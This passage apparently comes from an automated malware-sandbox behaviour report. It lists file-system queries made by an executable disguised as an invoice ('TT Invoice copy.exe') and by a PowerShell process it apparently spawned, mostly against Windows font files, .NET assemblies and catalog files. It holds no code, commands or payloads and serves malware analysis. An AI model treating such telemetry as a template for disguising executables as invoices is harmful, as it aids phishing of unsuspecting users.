                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\TT Invoice copy.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
